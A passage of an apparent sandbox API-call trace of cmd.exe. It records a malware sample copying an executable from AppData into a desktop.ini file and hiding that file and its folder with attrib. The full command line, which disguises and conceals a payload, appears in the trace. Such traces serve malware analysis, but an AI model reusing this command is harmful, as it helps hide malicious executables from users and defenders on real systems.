lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegCloseKey (hKey=0x40) returned 0x0 [0149.607] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae814 | out: phkResult=0x2ae814*=0x40) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x0, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x9, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x9, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: 
hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x9, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegCloseKey (hKey=0x40) returned 0x0 [0149.607] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886378 [0149.607] srand (_Seed=0x5b886378) [0149.607] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" [0149.607] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" [0149.608] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.608] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331cf8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0149.608] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.608] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.608] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.608] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.608] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.608] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.608] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.608] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.608] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.608] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.608] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.608] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.609] GetEnvironmentStringsW () returned 0x3326e8* [0149.609] FreeEnvironmentStringsW (penv=0x3326e8) returned 1 [0149.609] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.609] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.609] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.609] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.609] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.609] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.609] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.609] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.609] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0149.609] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.609] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af5e0, lpFilePart=0x2af5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af5dc*="Desktop") returned 0x18 [0149.609] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.609] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0x330d78 [0149.609] FindClose (in: hFindFile=0x330d78 | out: hFindFile=0x330d78) returned 1 [0149.610] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0x330d78 [0149.610] FindClose (in: hFindFile=0x330d78 | out: hFindFile=0x330d78) returned 1 [0149.610] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af35c | out: lpFindFileData=0x2af35c) returned 0x330d78 [0149.610] FindClose (in: hFindFile=0x330d78 | out: hFindFile=0x330d78) returned 1 [0149.610] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.610] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0149.610] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0149.610] GetEnvironmentStringsW () returned 0x330598* [0149.610] FreeEnvironmentStringsW (penv=0x330598) returned 1 [0149.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.611] GetConsoleOutputCP () returned 0x1b5 [0149.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0149.645] GetUserDefaultLCID () returned 0x409 [0149.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0149.645] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af720, cchData=128 | out: lpLCData="0") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af720, cchData=128 | out: lpLCData="0") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af720, cchData=128 | out: lpLCData="1") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0149.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0149.646] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.647] GetConsoleTitleW (in: lpConsoleTitle=0x320b70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0149.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.647] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0149.647] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0149.647] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0149.648] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0149.648] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0149.649] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0149.649] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0149.649] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0149.649] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0149.649] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0149.651] _wcsicmp (_String1="del", _String2=")") returned 59 [0149.651] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0149.652] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0149.652] _wcsicmp (_String1="IF", _String2="del") returned 5 [0149.652] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0149.652] _wcsicmp (_String1="REM", _String2="del") returned 14 [0149.652] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0149.654] _wcsicmp (_String1="type", _String2=")") returned 75 [0149.654] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0149.654] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0149.654] _wcsicmp (_String1="IF", _String2="type") returned -11 [0149.654] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0149.654] _wcsicmp (_String1="REM", _String2="type") returned -2 [0149.655] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0149.658] SetErrorMode (uMode=0x0) returned 0x0 [0149.658] SetErrorMode (uMode=0x1) returned 0x0 [0149.658] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x330658, lpFilePart=0x2aeed4 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2aeed4*="Desktop") returned 0x18 [0149.658] SetErrorMode (uMode=0x0) returned 0x1 [0149.659] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.659] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.663] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0xffffffff [0149.664] GetLastError () returned 0x2 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0xffffffff [0149.664] GetLastError () returned 0x2 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0x330940 [0149.664] FindClose (in: hFindFile=0x330940 | out: hFindFile=0x330940) returned 1 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0xffffffff [0149.664] GetLastError () returned 0x2 [0149.664] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec50) returned 0x330940 [0149.665] 
FindClose (in: hFindFile=0x330940 | out: hFindFile=0x330940) returned 1 [0149.665] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.665] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.665] GetConsoleTitleW (in: lpConsoleTitle=0x2af148, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.665] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aefd0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af098 | out: lpAttributeList=0x2aefd0, lpSize=0x2af098) returned 1 [0149.665] UpdateProcThreadAttribute (in: lpAttributeList=0x2aefd0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af090, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aefd0, lpPreviousValue=0x0) returned 1 [0149.665] GetStartupInfoW (in: lpStartupInfo=0x2aef8c | out: lpStartupInfo=0x2aef8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.665] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.666] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af02c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 
hStdError=0x0), lpProcessInformation=0x2af078 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessInformation=0x2af078*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbc4, dwThreadId=0xc88)) returned 1 [0149.669] CloseHandle (hObject=0x4c) returned 1 [0149.669] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.669] GetEnvironmentStringsW () returned 0x330bd0* [0149.669] FreeEnvironmentStringsW (penv=0x330bd0) returned 1 [0149.669] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0149.810] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aef6c | out: lpExitCode=0x2aef6c*=0x0) returned 1 [0149.810] CloseHandle (hObject=0x50) returned 1 [0149.810] _vsnwprintf (in: _Buffer=0x2af0b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aef78 | out: _Buffer="00000000") returned 8 [0149.810] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.810] GetEnvironmentStringsW () returned 0x3326d8* [0149.810] FreeEnvironmentStringsW (penv=0x3326d8) returned 1 [0149.810] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.810] GetEnvironmentStringsW () returned 0x3326d8* [0149.811] FreeEnvironmentStringsW (penv=0x3326d8) returned 1 [0149.811] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aefd0 | out: lpAttributeList=0x2aefd0) [0149.811] GetConsoleTitleW (in: lpConsoleTitle=0x2af350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.811] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae3c8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ae3cc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae3c8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0149.811] _wcsicmp 
(_String1="NTFS", _String2="FAT") returned 8 [0149.812] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0149.812] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0149.812] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\desktop.ini")) returned 0xffffffff [0149.812] GetLastError () returned 0x2 [0149.812] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1")) returned 0x10 [0149.812] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0149.812] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0149.812] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\desktop.ini")) returned 0xffffffff [0149.812] GetLastError () returned 0x2 [0149.812] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x333854, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x333854) returned 0xffffffff [0149.812] GetLastError () returned 0x2 [0149.812] _get_osfhandle (_FileHandle=2) returned 0xb [0149.812] GetFileType (hFile=0xb) returned 0x2 [0149.813] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0149.813] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2aedc8 | out: lpMode=0x2aedc8) returned 1 [0149.813] _get_osfhandle (_FileHandle=2) returned 0xb [0149.813] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2aedfc | out: lpConsoleScreenBufferInfo=0x2aedfc) returned 1 [0149.813] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: 
lpBuffer="Could Not Find %1\r\n") returned 0x13 [0149.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.814] GetFileType (hFile=0x7) returned 0x2 [0149.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0149.814] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af4ec | out: lpMode=0x2af4ec) returned 1 [0149.814] _dup (_FileHandle=1) returned 3 [0149.815] _close (_FileHandle=1) returned 0 [0149.815] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini", _String2="con") returned -53 [0149.815] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af4bc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0149.815] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0149.815] GetConsoleTitleW (in: lpConsoleTitle=0x2af2ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.816] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2aee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee50) returned 0x32e768 [0149.822] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0149.822] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0149.822] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0149.823] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), 
dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2add5c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0149.823] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] GetFileType (hFile=0x58) returned 0x1 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2addb4 | out: lpFileSizeHigh=0x2addb4*=0x0) returned 0x7d600 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.823] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.824] GetFileType (hFile=0x50) returned 0x1 [0149.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.824] GetFileType (hFile=0x50) returned 0x1 [0149.824] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.824] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 
[0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.826] GetFileType (hFile=0x50) returned 0x1 [0149.826] _get_osfhandle 